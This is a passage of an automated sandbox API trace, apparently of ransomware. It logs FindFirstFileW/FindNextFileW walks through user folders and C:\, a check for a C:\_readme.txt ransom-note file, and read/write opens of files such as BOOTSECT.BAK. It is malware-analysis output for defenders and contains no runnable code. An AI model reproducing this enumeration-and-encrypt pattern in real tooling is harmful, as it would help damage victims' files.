ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0091.055] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0091.055] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.056] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0091.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0091.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.057] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.057] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.057] PathFindFileNameW (pszPath="") returned="" [0091.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0091.058] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.059] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.059] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0091.059] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0091.059] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.059] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.059] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.059] PathFindFileNameW (pszPath="") returned="" [0091.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe82b8080, ftCreationTime.dwHighDateTime=0x1d5b8c9, ftLastAccessTime.dwLowDateTime=0x2e4d3710, ftLastAccessTime.dwHighDateTime=0x1d5bff6, ftLastWriteTime.dwLowDateTime=0x2e4d3710, ftLastWriteTime.dwHighDateTime=0x1d5bff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.060] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe82b8080, ftCreationTime.dwHighDateTime=0x1d5b8c9, ftLastAccessTime.dwLowDateTime=0x2e4d3710, ftLastAccessTime.dwHighDateTime=0x1d5bff6, ftLastWriteTime.dwLowDateTime=0x2e4d3710, ftLastWriteTime.dwHighDateTime=0x1d5bff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.060] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66250fd0, ftCreationTime.dwHighDateTime=0x1d5b85a, ftLastAccessTime.dwLowDateTime=0x71708880, ftLastAccessTime.dwHighDateTime=0x1d5bf10, ftLastWriteTime.dwLowDateTime=0x71708880, ftLastWriteTime.dwHighDateTime=0x1d5bf10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-u63kcF", cAlternateFileName="")) returned 1 [0091.060] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b114b40, ftCreationTime.dwHighDateTime=0x1d5c428, ftLastAccessTime.dwLowDateTime=0xafd7abf0, ftLastAccessTime.dwHighDateTime=0x1d5bd2e, ftLastWriteTime.dwLowDateTime=0xafd7abf0, ftLastWriteTime.dwHighDateTime=0x1d5bd2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2s0-", cAlternateFileName="")) returned 1 [0091.060] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586a6d70, ftCreationTime.dwHighDateTime=0x1d5bbcc, ftLastAccessTime.dwLowDateTime=0x7c620ce0, ftLastAccessTime.dwHighDateTime=0x1d5b93a, ftLastWriteTime.dwLowDateTime=0x7c620ce0, ftLastWriteTime.dwHighDateTime=0x1d5b93a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FyEWgj", cAlternateFileName="")) returned 1 [0091.060] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.060] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.061] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\") returned="IK1V\\" [0091.061] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0091.061] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.061] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.061] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.061] PathFindFileNameW (pszPath="") returned="" [0091.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa4ef0f0, ftCreationTime.dwHighDateTime=0x1d5b728, ftLastAccessTime.dwLowDateTime=0x14cb3170, ftLastAccessTime.dwHighDateTime=0x1d5b821, ftLastWriteTime.dwLowDateTime=0x14cb3170, ftLastWriteTime.dwHighDateTime=0x1d5b821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.062] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.062] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.062] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0091.062] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0091.062] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.062] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.062] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.062] PathFindFileNameW (pszPath="") returned="" [0091.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357573f0, ftCreationTime.dwHighDateTime=0x1d5be3d, ftLastAccessTime.dwLowDateTime=0x30c589f0, ftLastAccessTime.dwHighDateTime=0x1d5ba2b, ftLastWriteTime.dwLowDateTime=0x30c589f0, ftLastWriteTime.dwHighDateTime=0x1d5ba2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.063] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.063] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\") returned="_tGjm1G\\" [0091.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0091.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.063] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.063] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.063] PathFindFileNameW (pszPath="") returned="" [0091.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf366e0d0, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0x654aa400, ftLastAccessTime.dwHighDateTime=0x1d5b65a, ftLastWriteTime.dwLowDateTime=0x654aa400, ftLastWriteTime.dwHighDateTime=0x1d5b65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.063] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.063] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.064] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.064] PathFindFileNameW (pszPath="") returned="" [0091.064] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0091.064] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0091.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0091.064] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0091.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0091.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.064] FreeLibrary (hLibModule=0x75670000) returned 1 [0091.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0091.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x806) returned 0x31cf750 [0091.065] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0091.065] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.065] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6bdca8 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31efce8 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.065] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7540 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.065] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0091.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.065] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0091.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.066] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0091.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.066] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0091.066] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.066] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.066] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0091.066] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9c28 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2e8 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c7540 | out: hHeap=0x680000) returned 1 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0091.067] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175828 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2e8 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0091.067] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0091.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175828 | out: hHeap=0x680000) returned 1 [0091.067] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: 